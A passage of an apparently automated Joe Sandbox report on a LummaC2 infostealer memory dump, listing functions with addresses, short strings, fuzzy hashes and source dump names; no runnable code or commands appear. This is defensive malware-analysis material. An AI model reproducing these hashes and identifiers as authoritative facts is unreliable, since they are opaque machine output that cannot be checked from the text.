Opcode Fuzzy Hash: 5cf33e4cb939f51fb95528f43495b002458abf756fdf430c8f20abdcd73e1b08
Instruction Fuzzy Hash: 2522577164C3418FD725CFA4D89177BB7E2EB9A314F18892DE5C697362E7348802CB52

Function 009C4C50 Relevance: 3.3, Strings: 2, Instructions: 812COMMON

Download Yara Rule

Strings

8, xrefs: 009C5592
0, xrefs: 009C559A

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: e285061bcff5df1e29ccbbbbf0a519fe9595efbaaf41a99b790cb4c5f5b5e687
Instruction ID: 680bad7642a087c679c6bd567f274407aeebc3ad5b0a96086c8f0c0560165dd2
Opcode Fuzzy Hash: e285061bcff5df1e29ccbbbbf0a519fe9595efbaaf41a99b790cb4c5f5b5e687
Instruction Fuzzy Hash: CC725671A083419FD710CF18C890BAABBE1BF98354F45892DF98987391D375E998CB93

Function 009DCC60 Relevance: 3.0, Strings: 2, Instructions: 493COMMON

Download Yara Rule

Strings

06i`, xrefs: 009DD13A
46i`, xrefs: 009DD104

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 06i`$46i`
API String ID: 0-253969996
Opcode ID: 0fcf4d9afe37f3dc5e5d8f360aa83d5b03bc4f0b10de4dc7b9a9b09430995da9
Instruction ID: 9b4907193f871d08f3b56bd3c965f6aa2ddc600c236e0cfc565a1dc2a69da406
Opcode Fuzzy Hash: 0fcf4d9afe37f3dc5e5d8f360aa83d5b03bc4f0b10de4dc7b9a9b09430995da9
Instruction Fuzzy Hash: D6D135B2A583118BC724CF28CC503ABB7E6EFD5310F088A2DE8C58B394E7789905C791

Function 009F80C5 Relevance: 2.9, Strings: 2, Instructions: 443COMMON

Download Yara Rule

Strings

NO, xrefs: 009F8378
:, xrefs: 009F85B4

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: :$NO
API String ID: 0-151983983
Opcode ID: 702b2d89b0883f8a4591f6cd8ce25ae5349789370988a74aa1c8cd0e2aa7267b
Instruction ID: 41a0c9f1c233d1e116347d8dd1a06688ff29775e0bb25d6570b5e6c9c3bb0f18
Opcode Fuzzy Hash: 702b2d89b0883f8a4591f6cd8ce25ae5349789370988a74aa1c8cd0e2aa7267b
Instruction Fuzzy Hash: 34D1273762825ACBCB149FB8DC112AF73F2FF89351F1A8978D541872A0EB39D9528750

Function 009FE540 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

lohi, xrefs: 009FE624, 009FE6C5
{rsp, xrefs: 009FE750

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: lohi${rsp
API String ID: 2994545307-2839643115
Opcode ID: 0a75b182b5cf4ae8e9280b55116431de6c5f4be6fd848fcd10c7c8de7a7197de
Instruction ID: 4b3c7e925896bc9414563f860da10447c83febfe114b45f37ed574d3cec2b1c3
Opcode Fuzzy Hash: 0a75b182b5cf4ae8e9280b55116431de6c5f4be6fd848fcd10c7c8de7a7197de
Instruction Fuzzy Hash: D19128716083485FD724DE28D88067BB7E6EBD5318F29C93CE5D687261DA34EC06CB92

Function 009C4310 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 009C438B
IEND, xrefs: 009C4701

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: b050cfe4a512ff983d8d3d9ad0d18da9225df38cf43dd24a1f06c8686f7577f7
Instruction ID: 0d9290488c67f16d51af1a65a857692ff548f6e9d422c120e8bcd5e0faf90988
Opcode Fuzzy Hash: b050cfe4a512ff983d8d3d9ad0d18da9225df38cf43dd24a1f06c8686f7577f7
Instruction Fuzzy Hash: A5D17FB1A083449FE710CF18D855B9BBBE4EB94304F14492DF9999B382D775E908CB93

Function 009D7B75 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

s}, xrefs: 009D7C34
"#, xrefs: 009D7D10

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: "#$s}
API String ID: 0-1697270657
Opcode ID: 45a306792be70c5d0fdb520737cbd7a3eb2fd4539a670cd49a0fbe0c73dc47a3
Instruction ID: e790372199edfcd8880d72c022af328945ba4cfdabe7eae23956f0474fc59b9c
Opcode Fuzzy Hash: 45a306792be70c5d0fdb520737cbd7a3eb2fd4539a670cd49a0fbe0c73dc47a3
Instruction Fuzzy Hash: 51B176B41083818BD7748F28C4917EBBBE1EF96314F54896DE4C98B391EB358945CB92

Function 009EC289 Relevance: 2.8, Strings: 2, Instructions: 309COMMON

Download Yara Rule

Strings

@a, xrefs: 009EC2AF
u, xrefs: 009EC364

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$u
API String ID: 0-583156259
Opcode ID: 6940493c50017a23c3031656e902d62b338aa119ad2cb244a332d471674e7281
Instruction ID: ab9939f150162cdc2779efa238cb800f6589f2d1ebe6082e2092c7e496e4a56b
Opcode Fuzzy Hash: 6940493c50017a23c3031656e902d62b338aa119ad2cb244a332d471674e7281
Instruction Fuzzy Hash: FB81E4B050C3C18FD72ACF3984607ABBBD1AFDA304F18896DE4D997292DB358506CB52

Function 009D683F Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

gfff, xrefs: 009D6A5E
7, xrefs: 009D6991

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: f4f4da1d40c05dcd2b44a78070a7fa2f0dfd009336a36aab373f6a2bcc25c50d
Instruction ID: 588e4054969e01559b204b843f1727e042b1328b1378bee229f83801fcf39bfe
Opcode Fuzzy Hash: f4f4da1d40c05dcd2b44a78070a7fa2f0dfd009336a36aab373f6a2bcc25c50d
Instruction Fuzzy Hash: 87916973A542104FD718CF38CC527AB77E6ABC4324F19C63ED495DB395EA7898068B81

Function 009DAD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

x3,-, xrefs: 009DAE6E
CM, xrefs: 009DAF47

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: 9bfbb58ea9c472619e161a462641e07eebcf069ec36f21959d5d4f320a9c2eb8
Instruction ID: a48267a2ed7281d78aec5e260f97fce582e4eb3d48686bf8bec99d741e4bfed6
Opcode Fuzzy Hash: 9bfbb58ea9c472619e161a462641e07eebcf069ec36f21959d5d4f320a9c2eb8
Instruction Fuzzy Hash: 589150B4950B009FC7249F39C996616BFF0FF0A310B448A5EE4D68BB95D334E416CB96

Function 009DD172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

_8Y, xrefs: 009DD208
[U, xrefs: 009DD210

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 1b24c733088e52942f0a8c3c8463c82186dc34a82b506bb75ea700788b524527
Instruction ID: 07b4668b0c9b47a6b9f564e91ad93f7b2e3627121d775d81d95656d6cc1d77d4
Opcode Fuzzy Hash: 1b24c733088e52942f0a8c3c8463c82186dc34a82b506bb75ea700788b524527
Instruction Fuzzy Hash: 846121B068D3508BD700DF64D85266BB7F1EF92344F18896DE9C48B390E739D906CB56

Function 009DD189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

_8Y, xrefs: 009DD208
[U, xrefs: 009DD210

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: f20b37c9b5232bd9ea062388462863b1d187190556395c6a3899e4d67504396d
Instruction ID: dca2a4803b502e62060fa54ffa9ff0a7fb743c93a5d980fe8bd2bb594b46d01c
Opcode Fuzzy Hash: f20b37c9b5232bd9ea062388462863b1d187190556395c6a3899e4d67504396d
Instruction Fuzzy Hash: B25120B068D310CBD700DF64C85266BB7F1EFA2348F18896DE9848B394E739C906CB56

Function 009CF2A0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

], xrefs: 009CF3BF
J, xrefs: 009CF424

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: J$]
API String ID: 0-1719541227
Opcode ID: bd25107f3dd54756e37b8eda44d633bb3cbd3775a01ec7607bedfb6e19ae5f19
Instruction ID: bcc1d8c816bb4c0bd66cd71a17b7d49fd1b9309b9aa58f39bf2e8b706e0354e8
Opcode Fuzzy Hash: bd25107f3dd54756e37b8eda44d633bb3cbd3775a01ec7607bedfb6e19ae5f19
Instruction Fuzzy Hash: 51613833A1C7908BD3248A78889179FFBD29BD6324F194A3ED8E4D73D2D57988068743

Function 009E3C60 Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

Z[, xrefs: 009E3CE6
b"}, xrefs: 009E3CED

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: Z[$b"}
API String ID: 0-914116730
Opcode ID: 1f4f0e77c340d1590a1a142641ff877c62b70e2b4d8c84d0d441e8e3e91d0c23
Instruction ID: c3ec234463b1a5f7934ba6745d427faf03d88cf46589e93a9f368dc724013ebd
Opcode Fuzzy Hash: 1f4f0e77c340d1590a1a142641ff877c62b70e2b4d8c84d0d441e8e3e91d0c23
Instruction Fuzzy Hash: AA61F376A483449FE314CF65D8C075FBAE2EBC5704F09CA3DE9945B381C7B589068B92

Function 009D9820 Relevance: 2.7, Strings: 1, Instructions: 1444COMMON

Download Yara Rule

Strings

gd, xrefs: 009D9BE3

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gd
API String ID: 2994545307-565856990
Opcode ID: 4d4ac83dc0db561c39eb04f2586b18cb7f7c41eee1bdf5ef1f8ecca936325bd5
Instruction ID: d356a886ca277cb77bf21ed416d27dbcc79d5706e51f6a77e761ae9020d730f6
Opcode Fuzzy Hash: 4d4ac83dc0db561c39eb04f2586b18cb7f7c41eee1bdf5ef1f8ecca936325bd5
Instruction Fuzzy Hash: 3D9241716883019BE724DF60D88176BBBE6EBD9304F28C82EE5C687352D675DC46CB42

Function 009CE465 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

{L, xrefs: 009CE4BD
c, xrefs: 009CE46F

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: c${L
API String ID: 0-2217919563
Opcode ID: 30dbfbf403e8e2ebfe58208442057bfe5e2e418aa4fbf11eb0407823123c82c8
Instruction ID: ef1497fff014cb22fa775b81bbd514427b6425e9655aa3f4f5a84ab5e37653fe
Opcode Fuzzy Hash: 30dbfbf403e8e2ebfe58208442057bfe5e2e418aa4fbf11eb0407823123c82c8
Instruction Fuzzy Hash: B2512172A0C3D04BE724CB24C8517DFBBE3EBE5344F18493CD8CA97286E6755A468742

Function 009E90B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

5B3@, xrefs: 009E90C2
dV3T, xrefs: 009E90DA

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: f6c099ae1dce6681b3113b360f02f4c0448a4e7b529adb308d771eb044055e0f
Instruction ID: d6e2ef22abd6c8435050c6f76d01df78a0fbbf48fc2943a3245ab70063d95fd7
Opcode Fuzzy Hash: f6c099ae1dce6681b3113b360f02f4c0448a4e7b529adb308d771eb044055e0f
Instruction Fuzzy Hash: 3131CAB16083948FD3118F6A888075FFBF6BBD6B04F149A2CA5D59B295C7B489028B06

Function 009CD196 Relevance: 2.5, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 009CD196
CoUninitialize.OLE32 ref: 009CD1A0

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 528214fa2513112805b1115fc2fcd010a3e262bfc3cf4f03703c32112d3d66e9
Instruction ID: f78cf8e6cb10011bb9dfd7701da002a4d97b631446d02243f5f2e112b3abbeb7
Opcode Fuzzy Hash: 528214fa2513112805b1115fc2fcd010a3e262bfc3cf4f03703c32112d3d66e9
Instruction Fuzzy Hash: B8C01231510045DBD608CF60DCE8076B6B4B70734A7001518E403D3211CA149403850C

Function 009D4A50 Relevance: 2.4, Strings: 1, Instructions: 1153COMMON

Download Yara Rule

Strings

D]+\, xrefs: 009D5160

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: e1576a77b42fbdcc2feb38410436f6fb6df115ba3a9b5cdeb0669914ddd0b278
Instruction ID: f802ed7079f43a6757d0ccb2c74affaaa705b914c2b18205e115e86ac6fc2775
Opcode Fuzzy Hash: e1576a77b42fbdcc2feb38410436f6fb6df115ba3a9b5cdeb0669914ddd0b278
Instruction Fuzzy Hash: CF627435A48305DFDB149F24E892B3BB3A5FB99310F04882DE586573A1EB359803CB82

Function 009E66C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 009E67D6

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: df6f6663e9873123f9c2847f81fcdf80538e3bad3b366d040596d03e7b7b0d0e
Instruction ID: d98c1e30e83ed6dc9167038b7c844d88e306e750de24cedb0d0a7d667eb84ce8
Opcode Fuzzy Hash: df6f6663e9873123f9c2847f81fcdf80538e3bad3b366d040596d03e7b7b0d0e
Instruction Fuzzy Hash: 9EF156B19083818FC714CF69989132BBBE1EFD6354F08896DE5D58B382D678DD06CB92

Function 009EA3B0 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

", xrefs: 009EA6C1

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction ID: c80985e9553c0040f040b99a01ca5cd6adc92a9057562f1baf208c9bd655fdc4
Opcode Fuzzy Hash: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction Fuzzy Hash: A5F10871A083815FC716CF26C49072BBBE9AFC5314F19895DF899873A2D634ED058793

Function 009F68A0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

Y, xrefs: 009F68AF

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 593a5377861862ab39eeb2defc45bc99ae02e55b427979bc12acf7e91b98817e
Instruction ID: ec1eaa0cb7de637b775297bca890dd4a8dbe5eaa5179820190175177089f0e65
Opcode Fuzzy Hash: 593a5377861862ab39eeb2defc45bc99ae02e55b427979bc12acf7e91b98817e
